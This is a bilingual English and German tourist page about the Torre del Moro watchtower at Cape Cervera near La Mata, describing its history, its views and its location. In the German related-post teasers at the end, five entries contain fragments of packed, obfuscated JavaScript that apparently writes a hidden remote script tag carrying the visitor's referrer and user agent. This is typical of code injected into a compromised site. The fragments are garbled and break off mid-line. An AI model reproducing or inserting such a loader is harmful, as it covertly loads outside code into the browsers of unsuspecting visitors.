Torre del Moro


Tourist Lookout on the Torre del Moro (Moorish tower)

Located in the nearby district of La Mata, there is at Cape Cervera a viewpoint over 23,000 square meters, where the old Cervera Cape tower, generally known by locals as Torre del Moro (Moorish tower); it was built in the 14th century. From here you can enjoy one of the most spectacular views:

If you look to the N-NW, you can see the Tabarca island, and if you look towards S-SO, you will discover the nearby province of Murcia, the Mar Menor Sea and Isla Grosa island as reference points. On dry and windy days, the moisture disappears from the atmosphere and you can even see the windmills in the mountains La Union. From this vantage point, there are paths to the interior, where you can walk, and there is a sculpture dedicated to tourists, children’s games and two small cottages, reconstructions of old town houses.


But what makes this vantage point to something really special is the reconstruction of the old watchtower that has stood here previously; that is the Torre del Moro (Moorish tower). Its main task was to monitor the coastline, to warn of potential attacks by pirates or Berber, which often occurred in the 14th century. This tower has a diameter of nine meters and has undergone many changes throughout its history.


Torre del Tamarit

Torre Tamarit This watchtower is situated in Santa Pola, it was built in 1552 under the...

Torre del Moro

Tourist Lookout on the Torre del Moro (Moorish tower) Located in the nearby district of La...

Torre Escaletes in Santa Pola

Torre Escaletas in Santa Pola This watchtower stands in the north, the Cape of Santa Pola,...

Torre de la Horadada

Pilar de la Horadada has a long and interesting history. After the city was settled...

Torre del Moro

1660
Torre del Moro in La Mata

Touristischer Aussichtspunkt auf dem Torre del Moro (maurischer Turm)

Im nahegelegenen Bezirk La Mata gelegen, gibt es am Cervera Kap einen Aussichtspunkt über 23.000 Quadratmeter, wo der alte Cervera Kap Turm, bei Einheimischen allgemein als Torre del Moro (maurischer Turm) bekannt, im 14. Jahrhundert erbaut wurde. Von hier aus können Sie einen der spektakulärsten Ausblicke genießen:

Wenn Sie nach N-NW schauen, dann sehen Sie die Tabarca Insel, und wenn Sie Ihren Blick nach S-SO richten, dann werden Sie die nahegelegene Provinz Murcia entdecken, mit dem Mar Menor Meer und der Isla Grosa Insel als Referenzpunkten. An trockenen und windigen Tagen verschwindet die Feuchtigkeit aus der Atmosphäre und Sie können sogar die Windmühlen in der Bergkette La Union sehen. Von diesem Aussichtspunkt aus gibt es Pfade ins Innere, auf denen Sie spazieren gehen können, sowie eine Skulptur, die Touristen gewidmet ist, Kinderspiele und zwei kleine Hütten, Rekonstruktionen der alten Stadthäuser.

Aber was diesen Aussichtspunkt zu etwas wirklich besonderem macht, ist die Rekonstruktion des alten Wachturms, der hier früher gestanden hat: der Torre del Moro (maurischer Turm). Seine Hauptaufgabe war, die Küstenlinie zu überwachen, um vor potenziellen Angriffen durch Piraten oder Berber zu warnen, was im 14. Jahrhundert häufig vorkam. Dieser Turm hat einen Durchmesser von neun Metern und wurde im Laufe seiner Geschichte häufig verändert.

Koordinaten:

  • 38°00’04.1″N 0°39’06.0″W bzw.
  • 38.001129, -0.651653

Türme

Windmühle Molino La Calera

Molino La Calera die Windmühle in Santa Pola

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ezbbk||97|script|language|rel|nofollow|type|text|src|http|45|67|write|edftn|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Molino La Calera, diese Windmühle in Santa Pola an der 332,...
Leuchtturm Faro de Cabo Palos

Leuchtturm Faro de Cabo de Palos bei La Manga

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|thdyi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|erhhz|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Vom Leuchtturm Faro de Cabo de Palos bei La Manga aus...
Leuchtturm La Manga

Fotos vom Leuchtturm Cabo de Palos bei La Manga in Murcia

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|rsayt||97|script|language|rel|nofollow|type|text|src|http|45|67|write|zahse|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Fotos vom Leuchtturm Cabo de Palos in Murcia. Aktuelle Bilders und...
Leuchtturm von Santa Pola

Leuchtturm Santa Pola – Faro De Santa Pola Wanderwege und Ausflugsziel

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|bfybn||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ishyi|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Beliebtes Wanderziel, Aussichtsplattform und Sehenswürdigkeiten von Santa Pola: Der Leuchtturm (Faro)...
Turm vigia del Pinet

Torre vigía del Pinet

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|anybt||97|script|language|rel|nofollow|type|text|src|http|45|67|write|rkdyy|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Von dem ehemaligen Wachturm Torre vigía del Pinet an dem gleichnamigen...